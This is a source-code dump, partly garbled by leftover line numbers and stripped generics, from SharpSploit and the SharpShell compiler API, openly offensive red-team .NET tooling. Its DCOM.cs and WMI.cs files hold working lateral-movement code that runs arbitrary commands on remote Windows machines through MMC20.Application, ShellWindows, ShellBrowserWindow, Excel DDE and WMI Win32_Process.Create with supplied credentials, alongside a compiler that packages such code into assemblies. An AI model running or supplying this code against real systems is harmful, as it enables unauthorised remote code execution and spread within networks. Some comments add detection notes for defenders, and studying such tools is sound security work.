} 38 | } 39 | 40 | /// 41 | /// SharpSploitResultList extends the IList interface for SharpSploitResults to easily 42 | /// format a list of results from various SharpSploit functions. 
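///
/// <typeparam name="T">Result type held by the list; constrained to SharpSploitResult.</typeparam>
public class SharpSploitResultList<T> : IList<T> where T : SharpSploitResult
{
    // The generic type arguments were lost in the listing; they are restored throughout this
    // class from the "where T : SharpSploitResult" constraint and the T-typed members.
    private List<T> Results { get; } = new List<T>();

    public int Count => Results.Count;
    public bool IsReadOnly => ((IList<T>)Results).IsReadOnly;

    // Number of spaces between adjacent columns.
    private const int PROPERTY_SPACE = 3;

    /// <summary>
    /// Formats a SharpSploitResultList to a string similar to PowerShell's Format-List function.
    /// </summary>
    /// <returns>The same text that ToString() produces.</returns>
    public string FormatList()
    {
        return this.ToString();
    }

    // Not implemented; always returns an empty string.
    private string FormatTable()
    {
        // TODO
        return "";
    }

    /// <summary>
    /// Formats a SharpSploitResultList as a string. Overrides ToString() for convenience.
    /// </summary>
    /// <returns>
    /// A header row, a row of dashes, then one row per result; an empty string when the list is empty.
    /// </returns>
    public override string ToString()
    {
        if (this.Results.Count == 0)
        {
            return "";
        }

        // Column headers come from the first result. ResultProperties is read once per result
        // because the implementations in this file build a new list on every access.
        IList<SharpSploitResultProperty> headerProperties = this.Results[0].ResultProperties;
        StringBuilder table = new StringBuilder();
        StringBuilder underline = new StringBuilder();
        for (int i = 0; i < headerProperties.Count; i++)
        {
            string name = headerProperties[i].Name;
            table.Append(name);
            underline.Append(new String('-', name.Length));
            if (i != headerProperties.Count - 1)
            {
                table.Append(new String(' ', PROPERTY_SPACE));
                underline.Append(new String(' ', PROPERTY_SPACE));
            }
        }
        table.AppendLine();
        table.AppendLine(underline.ToString());

        foreach (SharpSploitResult result in this.Results)
        {
            IList<SharpSploitResultProperty> properties = result.ResultProperties;
            for (int i = 0; i < properties.Count; i++)
            {
                SharpSploitResultProperty property = properties[i];

                // A null Value is rendered as an empty cell instead of throwing.
                string valueText = property.Value?.ToString() ?? "";
                table.Append(valueText);
                if (i != properties.Count - 1)
                {
                    // Pad to the column width, with at least one space when the value is wider.
                    table.Append(new String(' ', Math.Max(1, property.Name.Length + PROPERTY_SPACE - valueText.Length)));
                }
            }
            table.AppendLine();
        }
        return table.ToString();
    }

    // The IList<T> members below delegate to the backing list.
    public T this[int index] { get => Results[index]; set => Results[index] = value; }

    public IEnumerator<T> GetEnumerator()
    {
        return Results.Cast<T>().GetEnumerator();
    }

    IEnumerator IEnumerable.GetEnumerator()
    {
        return Results.Cast<T>().GetEnumerator();
    }

    public int IndexOf(T item)
    {
        return Results.IndexOf(item);
    }

    public void Add(T t)
    {
        Results.Add(t);
    }

    public void AddRange(IEnumerable<T> range)
    {
        Results.AddRange(range);
    }

    public void Insert(int index, T item)
    {
        Results.Insert(index, item);
    }

    public void RemoveAt(int index)
    {
        Results.RemoveAt(index);
    }

    public void Clear()
    {
        Results.Clear();
    }

    public bool Contains(T item)
    {
        return Results.Contains(item);
    }

    public void CopyTo(T[] array, int arrayIndex)
    {
        Results.CopyTo(array, arrayIndex);
    }

    public bool Remove(T item)
    {
        return Results.Remove(item);
    }
}

/// <summary>
/// Abstract class that represents a result from a SharpSploit function.
/// </summary>
public abstract class SharpSploitResult
{
    // Name/value pairs that SharpSploitResultList.ToString() renders as columns.
    protected internal abstract IList<SharpSploitResultProperty> ResultProperties { get; }
}

/// <summary>SharpSploitResultProperty represents a property that is a member of a SharpSploitResult's ResultProperties.</summary>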
179 | /// 180 | public class SharpSploitResultProperty 181 | { 182 | public string Name { get; set; } 183 | public object Value { get; set; } 184 | } 185 | } 186 | -------------------------------------------------------------------------------- /SharpShell.API/Data/Source/SharpSploit/LateralMovement/DCOM.cs: -------------------------------------------------------------------------------- 1 | // Author: Ryan Cobb (@cobbr_io) 2 | // Project: SharpSploit (https://github.com/cobbr/SharpSploit) 3 | // License: BSD 3-Clause 4 | 5 | using System; 6 | using System.Linq; 7 | using System.Reflection; 8 | using System.Collections.Generic; 9 | 10 | namespace SharpSploit.LateralMovement 11 | { 12 | /// 13 | /// DCOM is a class for executing DCOM lateral movement techniques. 14 | /// 15 | public class DCOM 16 | { 17 | /// 18 | /// Execute a process on a remote system using various DCOM methods. 19 | /// 20 | /// ComputerName of remote system to execute process. 21 | /// Command to execute on remote system. 22 | /// 23 | /// 24 | /// DCOM execution method to use. Defaults to MMC20.Application. 25 | /// Bool. True if execution succeeds, false otherwise. 26 | /// 27 | /// Credit for the DCOM lateral movement techniques goes to Matt Nelson (@enigma0x3). 
/// This is a port of Steve Borosh (rvrshell)'s Invoke-DCOM implementation available
/// here: https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/master/Invoke-DCOM.ps1
///
public static bool DCOMExecute(string ComputerName, string Command, string Parameters = "", string Directory = "C:\\WINDOWS\\System32\\", DCOMMethod Method = DCOMMethod.MMC20_Application)
{
    // Every COM member is reached late-bound through reflection (InvokeMember), so no interop
    // assembly is referenced. Any exception on the way is caught once, written to stderr and
    // reported as false; a Method value matching no case falls through and still returns true.
    //
    // Defender's view (general knowledge, not something this file shows): the command is started
    // on the target by the process hosting the activated COM object, so process-creation
    // telemetry for unexpected children of that host, together with inbound DCOM activation,
    // is where this activity surfaces. Restricting remote launch/activation permissions on the
    // COM classes named below removes the path.
    try
    {
        switch (Method)
        {
            case DCOMMethod.MMC20_Application:
            {
                object mmc = Activator.CreateInstance(Type.GetTypeFromProgID("MMC20.Application", ComputerName));
                object mmcDocument = mmc.GetType().InvokeMember("Document", BindingFlags.GetProperty, null, mmc, null);
                object mmcView = mmcDocument.GetType().InvokeMember("ActiveView", BindingFlags.GetProperty, null, mmcDocument, null);
                mmcView.GetType().InvokeMember("ExecuteShellCommand", BindingFlags.InvokeMethod, null, mmcView, new object[] { Command, Directory, Parameters, "7" });
                break;
            }
            case DCOMMethod.ShellWindows:
            {
                object shellWindows = Activator.CreateInstance(Type.GetTypeFromCLSID(CLSIDs[Method], ComputerName));
                object window = shellWindows.GetType().InvokeMember("Item", BindingFlags.InvokeMethod, null, shellWindows, new object[] { });
                object windowDocument = window.GetType().InvokeMember("Document", BindingFlags.GetProperty, null, window, null);
                object shell = windowDocument.GetType().InvokeMember("Application", BindingFlags.GetProperty, null, windowDocument, null);
                shell.GetType().InvokeMember("ShellExecute", BindingFlags.InvokeMethod, null, shell, new object[] { Command, Parameters, Directory, null, 0 });
                break;
            }
            case DCOMMethod.ShellBrowserWindow:
            {
                object browserWindow = Activator.CreateInstance(Type.GetTypeFromCLSID(CLSIDs[Method], ComputerName));
                object browserDocument = browserWindow.GetType().InvokeMember("Document", BindingFlags.GetProperty, null, browserWindow, null);
                object shell = browserDocument.GetType().InvokeMember("Application", BindingFlags.GetProperty, null, browserDocument, null);
                shell.GetType().InvokeMember("ShellExecute", BindingFlags.InvokeMethod, null, shell, new object[] { Command, Parameters, Directory, null, 0 });
                break;
            }
            case DCOMMethod.ExcelDDE:
            {
                // Directory is not used on this path; only Command and Parameters are passed on.
                object excel = Activator.CreateInstance(Type.GetTypeFromProgID("Excel.Application", ComputerName));
                Type excelType = excel.GetType();
                excelType.InvokeMember("DisplayAlerts", BindingFlags.SetProperty, null, excel, new object[] { false });
                excelType.InvokeMember("DDEInitiate", BindingFlags.InvokeMethod, null, excel, new object[] { Command, Parameters });
                break;
            }
        }
        return true;
    }
    catch (Exception e)
    {
        Console.Error.WriteLine("DCOM Failed: " + e.Message);
        return false;
    }
}

///
/// Execute a process on a remote system using various DCOM methods.
///
/// ComputerNames of remote systems to execute process.
/// Command to execute on remote system.
///
///
/// DCOM execution method to use. Defaults to MMC20.Application.
/// Bool. True if execution succeeds, false otherwise.
///
/// Credit for the DCOM lateral movement techniques goes to Matt Nelson (@enigma0x3).
This is 90 | /// a port of Steve Borosh (rvrshell)'s Invoke-DCOM implementation available 91 | /// here: https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/master/Invoke-DCOM.ps1 92 | /// 93 | public static List DCOMExecute(List ComputerNames, string Command, string Parameters = "", string Directory = "C:\\WINDOWS\\System32\\", DCOMMethod Method = DCOMMethod.MMC20_Application) 94 | { 95 | return ComputerNames.Select(CN => DCOMExecute(CN, Command, Parameters, Directory, Method)).ToList(); 96 | } 97 | 98 | public enum DCOMMethod 99 | { 100 | MMC20_Application, 101 | ShellWindows, 102 | ShellBrowserWindow, 103 | ExcelDDE 104 | } 105 | 106 | private static readonly Dictionary CLSIDs = new Dictionary 107 | { 108 | { DCOMMethod.ShellWindows, new Guid("9BA05972-F6A8-11CF-A442-00A0C90A8F39") }, 109 | { DCOMMethod.ShellBrowserWindow, new Guid("C08AFD90-F2A1-11D1-8455-00A0C91F3880") } 110 | }; 111 | } 112 | } 113 | -------------------------------------------------------------------------------- /SharpShell.API/Data/Source/SharpSploit/LateralMovement/WMI.cs: -------------------------------------------------------------------------------- 1 | // Author: Ryan Cobb (@cobbr_io) 2 | // Project: SharpSploit (https://github.com/cobbr/SharpSploit) 3 | // License: BSD 3-Clause 4 | 5 | using System; 6 | using System.Linq; 7 | using System.Management; 8 | using System.Collections.Generic; 9 | 10 | namespace SharpSploit.LateralMovement 11 | { 12 | /// 13 | /// WMI is a class for executing WMI lateral movement techniques. 14 | /// 15 | public class WMI 16 | { 17 | /// 18 | /// Execute a process on a remote system using the WMI Win32_Process.Create method. 19 | /// 20 | /// ComputerName of remote system to execute process. 21 | /// Command to execute on remote system. 22 | /// Username to authenticate as to the remote system. 23 | /// Password to authenticate the user. 24 | /// Bool. True if execution succeeds, false otherwise. 
25 | public static bool WMIExecute(string ComputerName, string Command, string Username, string Password) 26 | { 27 | ConnectionOptions options = new ConnectionOptions(); 28 | options.Username = Username; 29 | options.Password = Password; 30 | 31 | ManagementScope scope = new ManagementScope(String.Format("\\\\{0}\\root\\cimv2", ComputerName), options); 32 | 33 | try 34 | { 35 | scope.Connect(); 36 | var wmiProcess = new ManagementClass(scope, new ManagementPath("Win32_Process"), new ObjectGetOptions()); 37 | 38 | ManagementBaseObject inParams = wmiProcess.GetMethodParameters("Create"); 39 | PropertyDataCollection properties = inParams.Properties; 40 | inParams["CommandLine"] = Command; 41 | 42 | ManagementBaseObject outParams = wmiProcess.InvokeMethod("Create", inParams, null); 43 | 44 | Console.WriteLine("Win32_Process Create returned: " + outParams["returnValue"].ToString()); 45 | Console.WriteLine("ProcessID: " + outParams["processId"].ToString()); 46 | return true; 47 | } 48 | catch (Exception e) 49 | { 50 | Console.Error.WriteLine("WMI Exception:" + e.Message); 51 | } 52 | return false; 53 | } 54 | 55 | /// 56 | /// Execute a process on a remote system using the WMI Win32_Process.Create method. 57 | /// 58 | /// ComputerNames of remote systems to execute process. 59 | /// Command to execute on remote system. 60 | /// Username to authenticate as to the remote system. 61 | /// Password to authenticate the user. 62 | /// Bool. True if execution succeeds, false otherwise. 
63 | public static List WMIExecute(List ComputerNames, string Command, string Username, string Password) 64 | { 65 | return ComputerNames.Select(CN => WMIExecute(CN, Command, Username, Password)).ToList(); 66 | } 67 | } 68 | } 69 | -------------------------------------------------------------------------------- /SharpShell.API/Data/Source/SharpSploit/Misc/CountdownEvent.cs: -------------------------------------------------------------------------------- 1 | // Author: Ryan Cobb (@cobbr_io) 2 | // Project: SharpSploit (https://github.com/cobbr/SharpSploit) 3 | // License: BSD 3-Clause 4 | 5 | using System; 6 | using System.Threading; 7 | 8 | namespace SharpSploit.Misc 9 | { 10 | /// 11 | /// CountdownEvent is used for counting Asynchronous operations 12 | /// 13 | /// 14 | /// Adapted from https://stackoverflow.com/questions/6790499 15 | /// 16 | public sealed class CountdownEvent : IDisposable 17 | { 18 | private readonly ManualResetEvent _countEvent = new ManualResetEvent(false); 19 | private readonly ManualResetEvent _reachedCountEvent = new ManualResetEvent(false); 20 | private volatile int _maxCount; 21 | private volatile int _currentCount = 0; 22 | private volatile bool _isDisposed = false; 23 | 24 | public CountdownEvent(int count) 25 | { 26 | this._maxCount = count; 27 | } 28 | 29 | public bool Signal() 30 | { 31 | if (this._isDisposed) 32 | { 33 | return false; 34 | } 35 | if (this._currentCount >= this._maxCount) 36 | { 37 | return true; 38 | } 39 | if (Interlocked.Increment(ref _currentCount) >= this._maxCount) 40 | { 41 | _reachedCountEvent.Set(); 42 | return true; 43 | } 44 | _countEvent.Set(); 45 | return false; 46 | } 47 | 48 | public bool Wait(int timeout = Timeout.Infinite) 49 | { 50 | if (this._isDisposed) 51 | { 52 | return false; 53 | } 54 | return _reachedCountEvent.WaitOne(timeout); 55 | } 56 | 57 | public bool WaitOne(int timeout = Timeout.Infinite) 58 | { 59 | if (this._isDisposed) 60 | { 61 | return false; 62 | } 63 | return 
_countEvent.WaitOne(timeout); 64 | } 65 | 66 | public void Dispose() 67 | { 68 | this.Dispose(true); 69 | GC.SuppressFinalize(this); 70 | } 71 | 72 | public void Dispose(bool disposing) 73 | { 74 | if (!this._isDisposed) 75 | { 76 | if (disposing) 77 | { 78 | ((IDisposable)_reachedCountEvent).Dispose(); 79 | ((IDisposable)_countEvent).Dispose(); 80 | } 81 | this._isDisposed = true; 82 | } 83 | } 84 | } 85 | } 86 | -------------------------------------------------------------------------------- /SharpShell.API/Data/Source/SharpSploit/Misc/Utilities.cs: -------------------------------------------------------------------------------- 1 | // Author: Ryan Cobb (@cobbr_io) 2 | // Project: SharpSploit (https://github.com/cobbr/SharpSploit) 3 | // License: BSD 3-Clause 4 | 5 | using System.IO; 6 | using System.IO.Compression; 7 | using System.Linq; 8 | using System.Reflection; 9 | 10 | namespace SharpSploit.Misc 11 | { 12 | public static class Utilities 13 | { 14 | private static string[] manifestResources = Assembly.GetExecutingAssembly().GetManifestResourceNames(); 15 | 16 | public static byte[] GetEmbeddedResourceBytes(string resourceName) 17 | { 18 | string resourceFullName = manifestResources.FirstOrDefault(N => N.Contains(resourceName + ".comp")); 19 | if (resourceFullName != null) 20 | { 21 | return Decompress(Assembly.GetExecutingAssembly().GetManifestResourceStream(resourceFullName).ReadFully()); 22 | } 23 | else if ((resourceFullName = manifestResources.FirstOrDefault(N => N.Contains(resourceName))) != null) 24 | { 25 | return Assembly.GetExecutingAssembly().GetManifestResourceStream(resourceFullName).ReadFully(); 26 | } 27 | return null; 28 | } 29 | 30 | public static byte[] ReadFully(this Stream input) 31 | { 32 | byte[] buffer = new byte[16 * 1024]; 33 | using (MemoryStream ms = new MemoryStream()) 34 | { 35 | int read; 36 | while((read = input.Read(buffer, 0, buffer.Length)) > 0) 37 | { 38 | ms.Write(buffer, 0, read); 39 | } 40 | return ms.ToArray(); 41 | } 
42 | } 43 | 44 | public static byte[] Compress(byte[] Bytes) 45 | { 46 | byte[] compressedBytes; 47 | using (MemoryStream memoryStream = new MemoryStream()) 48 | { 49 | using (DeflateStream deflateStream = new DeflateStream(memoryStream, CompressionMode.Compress)) 50 | { 51 | deflateStream.Write(Bytes, 0, Bytes.Length); 52 | } 53 | compressedBytes = memoryStream.ToArray(); 54 | } 55 | return compressedBytes; 56 | } 57 | 58 | public static byte[] Decompress(byte[] compressed) 59 | { 60 | using (MemoryStream inputStream = new MemoryStream(compressed.Length)) 61 | { 62 | inputStream.Write(compressed, 0, compressed.Length); 63 | inputStream.Seek(0, SeekOrigin.Begin); 64 | using (MemoryStream outputStream = new MemoryStream()) 65 | { 66 | using (DeflateStream deflateStream = new DeflateStream(inputStream, CompressionMode.Decompress)) 67 | { 68 | byte[] buffer = new byte[4096]; 69 | int bytesRead; 70 | while ((bytesRead = deflateStream.Read(buffer, 0, buffer.Length)) != 0) 71 | { 72 | outputStream.Write(buffer, 0, bytesRead); 73 | } 74 | } 75 | return outputStream.ToArray(); 76 | } 77 | } 78 | } 79 | } 80 | } 81 | -------------------------------------------------------------------------------- /SharpShell.API/Models/Common.cs: -------------------------------------------------------------------------------- 1 | // Author: Ryan Cobb (@cobbr_io) 2 | // Project: SharpShell (https://github.com/cobbr/SharpShell) 3 | // License: BSD 3-Clause 4 | 5 | using System.IO; 6 | using System.Text; 7 | using System.Reflection; 8 | 9 | namespace SharpShell.API.Models 10 | { 11 | public static class Common 12 | { 13 | public static Encoding SharpShellEncoding = Encoding.UTF8; 14 | public static string SharpShellDirectory = Assembly.GetExecutingAssembly().Location.Split("bin")[0].Split("SharpShell.API.dll")[0]; 15 | public static string SharpShellDataDirectory = SharpShellDirectory + "Data" + Path.DirectorySeparatorChar; 16 | 17 | public static string SharpShellResourcesDirectory = 
SharpShellDataDirectory + "Resources" + Path.DirectorySeparatorChar; 18 | public static string SharpShellResourcesConfig = SharpShellResourcesDirectory + "resources.yml"; 19 | 20 | public static string SharpShellReferencesDirectory = SharpShellDataDirectory + "References" + Path.DirectorySeparatorChar; 21 | public static string SharpShellReferencesConfig = SharpShellReferencesDirectory + "references.yml"; 22 | 23 | public static string Net35Directory = SharpShellReferencesDirectory + "net35" + Path.DirectorySeparatorChar; 24 | public static string Net40Directory = SharpShellReferencesDirectory + "net40" + Path.DirectorySeparatorChar; 25 | 26 | public static string SharpShellSourceDirectory = SharpShellDataDirectory + "Source" + Path.DirectorySeparatorChar; 27 | } 28 | } -------------------------------------------------------------------------------- /SharpShell.API/Models/Compiler.cs: -------------------------------------------------------------------------------- 1 | // Author: Ryan Cobb (@cobbr_io) 2 | // Project: SharpShell (https://github.com/cobbr/SharpShell) 3 | // License: BSD 3-Clause 4 | 5 | using System; 6 | using System.IO; 7 | using System.Text; 8 | using System.Linq; 9 | using System.IO.Compression; 10 | using System.Collections.Generic; 11 | 12 | using Microsoft.CodeAnalysis; 13 | using Microsoft.CodeAnalysis.CSharp; 14 | using Microsoft.CodeAnalysis.CSharp.Syntax; 15 | using Microsoft.CodeAnalysis.Emit; 16 | 17 | namespace SharpShell.API.Models 18 | { 19 | public class Compiler 20 | { 21 | public class CompilationRequest 22 | { 23 | public string Source { get; set; } = null; 24 | public string SourceDirectory { get; set; } = null; 25 | public string ResourceDirectory { get; set; } = null; 26 | public string ReferenceDirectory { get; set; } = null; 27 | 28 | public DotNetVersion TargetDotNetVersion { get; set; } = DotNetVersion.Net35; 29 | public OutputKind OutputKind { get; set; } = OutputKind.DynamicallyLinkedLibrary; 30 | public Platform Platform { 
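get; set; } = Platform.AnyCpu;
    public bool Optimize = true;

    public string AssemblyName { get; set; } = null;
    public List<Reference> References { get; set; } = new List<Reference>();
    public List<EmbeddedResource> EmbeddedResources { get; set; } = new List<EmbeddedResource>();
}

public enum DotNetVersion
{
    Net35,
    Net40
}

public class EmbeddedResource
{
    public string Name { get; set; }
    // File name, resolved against CompilationRequest.ResourceDirectory by Compile.
    public string File { get; set; }
    public Platform Platform { get; set; } = Platform.AnyCpu;
    public bool Enabled { get; set; } = false;
}

public class Reference
{
    // File name, resolved against the net35/net40 folder under CompilationRequest.ReferenceDirectory by Compile.
    public string File { get; set; }
    public DotNetVersion Framework { get; set; } = DotNetVersion.Net35;
    public bool Enabled { get; set; } = false;
}

private class SourceSyntaxTree
{
    public string FileName { get; set; } = "";
    public SyntaxTree SyntaxTree { get; set; }
    public List<INamedTypeSymbol> UsedTypes { get; set; } = new List<INamedTypeSymbol>();
}

/// <summary>
/// Compiles <c>request.Source</c> together with every *.cs file found under
/// <c>request.SourceDirectory</c> and returns the emitted assembly image.
/// </summary>
/// <remarks>
/// When <c>request.Optimize</c> is set, a first compilation is used only to find which types the
/// source uses; library trees that define none of them and unused using directives are dropped
/// before the final compilation.
/// Reference and resource file names are resolved against their configured directories and are
/// rejected when the resolved path leaves that directory. CompilationRequest is a public model of
/// the API project, so these names may originate from a client (TODO confirm against the
/// controller, which is not visible here).
/// </remarks>
/// <param name="request">Source text, directories and options for the compilation.</param>
/// <returns>The bytes of the emitted assembly.</returns>
/// <exception cref="CompilerException">
/// Emit reported failure, or a reference or resource file resolves outside its directory.
/// </exception>
public static byte[] Compile(CompilationRequest request)
{
    // Gather SyntaxTrees for compilation
    List<SourceSyntaxTree> sourceSyntaxTrees = Directory.GetFiles(request.SourceDirectory, "*.cs", SearchOption.AllDirectories)
        .Select(F => new SourceSyntaxTree { FileName = F, SyntaxTree = CSharpSyntaxTree.ParseText(File.ReadAllText(F), new CSharpParseOptions()) })
        .ToList();
    List<SyntaxTree> compilationTrees = sourceSyntaxTrees.Select(S => S.SyntaxTree).ToList();

    SyntaxTree sourceTree = CSharpSyntaxTree.ParseText(request.Source, new CSharpParseOptions());
    compilationTrees.Add(sourceTree);

    string assemblyName = request.AssemblyName ?? Path.GetRandomFileName();
    List<PortableExecutableReference> references = LoadReferences(request);

    // Use specified OutputKind and Platform
    CSharpCompilationOptions options = new CSharpCompilationOptions(outputKind: request.OutputKind, optimizationLevel: OptimizationLevel.Release, platform: request.Platform);
    // Compile to obtain SemanticModel
    CSharpCompilation compilation = CSharpCompilation.Create(assemblyName, compilationTrees, references, options);

    // Perform source code optimization, removing unused types
    if (request.Optimize)
    {
        // Find all Types used by the generated compilation
        List<INamedTypeSymbol> usedTypes = new List<INamedTypeSymbol>();
        GetUsedTypesRecursively(compilation, sourceTree, ref usedTypes, ref sourceSyntaxTrees);
        usedTypes = usedTypes.Distinct().ToList();
        List<string> usedTypeNames = usedTypes.Select(T => GetFullyQualifiedTypeName(T)).ToList();

        // Filter SyntaxTrees to trees that define a used Type, otherwise the tree is not needed in this compilation
        compilationTrees = sourceSyntaxTrees.Where(SST => SyntaxTreeDefinesUsedType(compilation, SST.SyntaxTree, usedTypeNames))
            .Select(SST => SST.SyntaxTree)
            .ToList();

        // Remove unused using directives from the additional entrypoint source
        List<string> usedNamespaceNames = GetUsedTypes(compilation, sourceTree)
            .Select(T => GetFullyQualifiedContainingNamespaceName(T)).Distinct().ToList();
        List<SyntaxNode> unusedUsingDirectives = sourceTree.GetRoot().DescendantNodes().Where(N =>
        {
            return N.Kind() == SyntaxKind.UsingDirective && !usedNamespaceNames.Contains(((UsingDirectiveSyntax)N).Name.ToFullString());
        }).ToList();
        sourceTree = sourceTree.GetRoot().RemoveNodes(unusedUsingDirectives, SyntaxRemoveOptions.KeepNoTrivia).SyntaxTree;

        // Compile again, with unused SyntaxTrees and unused using statements removed
        compilationTrees.Add(sourceTree);
        compilation = CSharpCompilation.Create(assemblyName, compilationTrees, references, options);
    }

    // Resolve resource paths up front so a rejected file name fails before anything is emitted.
    List<ResourceDescription> resources = request.EmbeddedResources
        .Where(ER => request.Platform == Platform.AnyCpu || ER.Platform == Platform.AnyCpu || ER.Platform == request.Platform)
        .Where(ER => ER.Enabled)
        .Select(ER =>
        {
            string resourcePath = ResolveInsideDirectory(request.ResourceDirectory, ER.File);
            return new ResourceDescription(ER.Name, () => File.OpenRead(resourcePath), true);
        }).ToList();

    // Emit compilation
    using (var ms = new MemoryStream())
    {
        EmitResult emitResult = compilation.Emit(ms, manifestResources: resources);
        if (!emitResult.Success)
        {
            StringBuilder sb = new StringBuilder();
            foreach (Diagnostic d in emitResult.Diagnostics)
            {
                sb.AppendLine(d.ToString());
            }
            throw new CompilerException("CompilationErrors: " + Environment.NewLine + sb);
        }
        return ms.ToArray();
    }
}

// Builds the metadata references that are enabled for the request's target framework.
private static List<PortableExecutableReference> LoadReferences(CompilationRequest request)
{
    string folder = request.ReferenceDirectory
        + (request.TargetDotNetVersion == DotNetVersion.Net35 ? "net35" : "net40")
        + Path.DirectorySeparatorChar;
    return request.References
        .Where(R => R.Framework == request.TargetDotNetVersion)
        .Where(R => R.Enabled)
        .Select(R => MetadataReference.CreateFromFile(ResolveInsideDirectory(folder, R.File)))
        .ToList();
}

// Joins directory and file by plain concatenation (directory is expected to end with a
// separator, as the Common.* directory constants do) and rejects the result when the
// normalised path no longer lies inside the directory, e.g. because file contains "..".
private static string ResolveInsideDirectory(string directory, string file)
{
    string root = Path.GetFullPath(String.IsNullOrEmpty(directory) ? "." : directory);
    if (!root.EndsWith(Path.DirectorySeparatorChar.ToString(), StringComparison.Ordinal))
    {
        root += Path.DirectorySeparatorChar;
    }
    string candidate = Path.GetFullPath(directory + file);
    if (!candidate.StartsWith(root, StringComparison.Ordinal))
    {
        throw new CompilerException("File is outside the configured directory: " + file);
    }
    return candidate;
}

private static string GetFullyQualifiedContainingNamespaceName(INamespaceSymbol namespaceSymbol)
{
    string name = namespaceSymbol.Name;
    namespaceSymbol =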
namespaceSymbol.ContainingNamespace; 168 | while (namespaceSymbol != null) 169 | { 170 | name = namespaceSymbol.Name + "." + name; 171 | namespaceSymbol = namespaceSymbol.ContainingNamespace; 172 | } 173 | return name.Trim('.'); 174 | } 175 | 176 | private static string GetFullyQualifiedContainingNamespaceName(INamedTypeSymbol namedTypeSymbol) 177 | { 178 | return GetFullyQualifiedContainingNamespaceName(namedTypeSymbol.ContainingNamespace); 179 | } 180 | 181 | private static string GetFullyQualifiedTypeName(INamedTypeSymbol namedTypeSymbol) 182 | { 183 | return GetFullyQualifiedContainingNamespaceName(namedTypeSymbol) + "." + namedTypeSymbol.Name; 184 | } 185 | 186 | private static bool SyntaxTreeDefinesUsedType(CSharpCompilation compilation, SyntaxTree tree, List typeNames) 187 | { 188 | SemanticModel model = compilation.GetSemanticModel(tree); 189 | return null != tree.GetRoot().DescendantNodes().FirstOrDefault(SN => 190 | { 191 | if (SN.Kind() != SyntaxKind.ClassDeclaration) 192 | { 193 | return false; 194 | } 195 | INamedTypeSymbol symbol = model.GetDeclaredSymbol(((ClassDeclarationSyntax)SN)); 196 | if (symbol == null) 197 | { 198 | return false; 199 | } 200 | return typeNames.Contains( 201 | GetFullyQualifiedTypeName(symbol) 202 | ); 203 | }); 204 | } 205 | 206 | private static List GetUsedTypes(CSharpCompilation compilation, SyntaxTree sourceTree) 207 | { 208 | return sourceTree.GetRoot().DescendantNodes().Select(N => 209 | { 210 | ISymbol symbol = compilation.GetSemanticModel(sourceTree).GetSymbolInfo(N).Symbol; 211 | if (symbol != null && symbol.ContainingType != null) 212 | { 213 | return symbol.ContainingType; 214 | } 215 | return null; 216 | }).Distinct().Where(T => T != null).ToList(); 217 | } 218 | 219 | private static List GetUsedTypesRecursively(CSharpCompilation compilation, SyntaxTree sourceTree, ref List currentUsedTypes, ref List sourceSyntaxTrees) 220 | { 221 | List copyCurrentUsedTypes = currentUsedTypes.Select(CT => 
GetFullyQualifiedTypeName(CT)).ToList(); 222 | List usedTypes = GetUsedTypes(compilation, sourceTree) 223 | .Where(T => !copyCurrentUsedTypes.Contains(GetFullyQualifiedTypeName(T))) 224 | .ToList(); 225 | currentUsedTypes.AddRange(usedTypes); 226 | 227 | List searchTrees = new List(); 228 | foreach (INamedTypeSymbol symbol in usedTypes) 229 | { 230 | SyntaxReference sr = symbol.DeclaringSyntaxReferences.FirstOrDefault(); 231 | if (sr != null) 232 | { 233 | SourceSyntaxTree sst = sourceSyntaxTrees.FirstOrDefault(SST => SST.SyntaxTree == sr.SyntaxTree); 234 | if (sst != null) { sst.UsedTypes.Add(symbol); } 235 | string fullyQualifiedTypeName = GetFullyQualifiedTypeName(symbol); 236 | searchTrees.Add(sr.SyntaxTree); 237 | } 238 | } 239 | 240 | searchTrees = searchTrees.Distinct().ToList(); 241 | foreach (SyntaxTree tree in searchTrees) 242 | { 243 | List newTypes = GetUsedTypesRecursively(compilation, tree, ref currentUsedTypes, ref sourceSyntaxTrees); 244 | currentUsedTypes.AddRange(newTypes); 245 | } 246 | return currentUsedTypes; 247 | } 248 | 249 | public static byte[] Compress(byte[] bytes) 250 | { 251 | byte[] compressedILBytes; 252 | using (MemoryStream memoryStream = new MemoryStream()) 253 | { 254 | using (DeflateStream deflateStream = new DeflateStream(memoryStream, CompressionMode.Compress)) 255 | { 256 | deflateStream.Write(bytes, 0, bytes.Length); 257 | } 258 | compressedILBytes = memoryStream.ToArray(); 259 | } 260 | return compressedILBytes; 261 | } 262 | } 263 | 264 | public class CompilerException : Exception 265 | { 266 | public CompilerException() 267 | { 268 | 269 | } 270 | 271 | public CompilerException(string message) : base(message) 272 | { 273 | 274 | } 275 | 276 | public CompilerException(string message, Exception inner) : base(message, inner) 277 | { 278 | 279 | } 280 | } 281 | } -------------------------------------------------------------------------------- /SharpShell.API/Models/SharpShellContext.cs: 
-------------------------------------------------------------------------------- 1 | // Author: Ryan Cobb (@cobbr_io) 2 | // Project: SharpShell (https://github.com/cobbr/SharpShell) 3 | // License: BSD 3-Clause 4 | 5 | using Microsoft.EntityFrameworkCore; 6 | 7 | namespace SharpShell.API.Models 8 | { 9 | public class SharpShellContext : DbContext 10 | { 11 | public SharpShellContext(DbContextOptions options) : base(options) 12 | { 13 | 14 | } 15 | } 16 | } 17 | -------------------------------------------------------------------------------- /SharpShell.API/Properties/launchSettings.json: -------------------------------------------------------------------------------- 1 | { 2 | "$schema": "http://json.schemastore.org/launchsettings.json", 3 | "iisSettings": { 4 | "windowsAuthentication": false, 5 | "anonymousAuthentication": true, 6 | "iisExpress": { 7 | "applicationUrl": "http://localhost:56312", 8 | "sslPort": 44352 9 | } 10 | }, 11 | "profiles": { 12 | "IIS Express": { 13 | "commandName": "IISExpress", 14 | "launchBrowser": true, 15 | "launchUrl": "api/values", 16 | "environmentVariables": { 17 | "ASPNETCORE_ENVIRONMENT": "Development" 18 | } 19 | }, 20 | "SharpSploit.API": { 21 | "commandName": "Project", 22 | "launchBrowser": true, 23 | "launchUrl": "api/values", 24 | "applicationUrl": "https://localhost:5001;http://localhost:5000", 25 | "environmentVariables": { 26 | "ASPNETCORE_ENVIRONMENT": "Development" 27 | } 28 | } 29 | } 30 | } -------------------------------------------------------------------------------- /SharpShell.API/SharpShell.API.csproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | netcoreapp2.1 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 